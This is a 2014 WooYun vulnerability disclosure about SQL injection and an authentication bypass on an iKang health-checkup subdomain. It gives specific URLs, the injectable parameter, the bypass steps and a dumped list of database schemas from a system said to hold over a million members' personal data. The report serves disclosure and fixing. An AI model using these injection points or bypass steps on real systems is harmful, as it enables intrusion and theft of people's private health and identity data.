当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073908

漏洞标题:爱康国宾(员工体检)某重要分站SQL注入多库和越权

相关厂商:爱康国宾

漏洞作者: 小胖子

提交时间:2014-08-26 16:21

修复时间:2014-10-10 16:22

公开时间:2014-10-10 16:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-26: 细节已通知厂商并且等待厂商处理中
2014-08-26: 厂商已经确认,细节仅向厂商公开
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-10: 细节向公众公开

简要描述:

嗯,这个点也是,我开始还以为是mysql

详细说明:

同样能读取到主站或者MISNEW的110W+会员信息。
漏洞系统:mec.ikang.com
随便在搜索引擎搜索一下,发现收录了很多类似以下的连接
http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760
这里可以看到 登陆的username就是kefupeixun

link.jpg


这个地址是不需要授权访问的
[b]但是,访问这个地址之后,再访问其他功能页,就不需要登陆了,就是当前登陆的user了,这个比较坑有木有[/b]
比如先访问了
http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760
马上访问
http://mec.ikang.com/showexam.php
就直接以客服培训的身份登陆了

2.jpg


另外,越权地址也是存在SQL注入的。
注入点:http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760
加单引号报错 error-based,爆出路径

luj.jpg


注入参数 v
数据库系统:oracle

sql.jpg


这个直接就是主库 MISNEW了,member里面的信息就太多了,手机号,姓名,身份证之类的

new.jpg


漏洞证明:

available databases [38]:
[*] APEX_030200
[*] APPQOSSYS
[*] BA
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DEPO
[*] EP
[*] EXFSYS
[*] FLOWS_FILES
[*] GOME
[*] IKANG
[*] IKANG_LDAP
[*] IKANGLIS
[*] IKANGMIS3
[*] IKANGMIS3NEW
[*] JKCITY
[*] MDSYS
[*] MEC
[*] MIS2
[*] MISNEW
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] QCMS
[*] RMS
[*] SURVEY
[*] SYS
[*] SYSTEM
[*] THIRDPARTY
[*] TP
[*] TRT
[*] WMSYS
[*] WWW
[*] XDB
[*] ZHIFUBAO

修复方案:

检查过滤用户输入。

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-26 16:46

厂商回复:

漏洞确认,我们会尽快修复,谢谢!

最新状态:

暂无

漏洞评价:

评论

  1. 2014-08-26 18:05 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    真爽。。。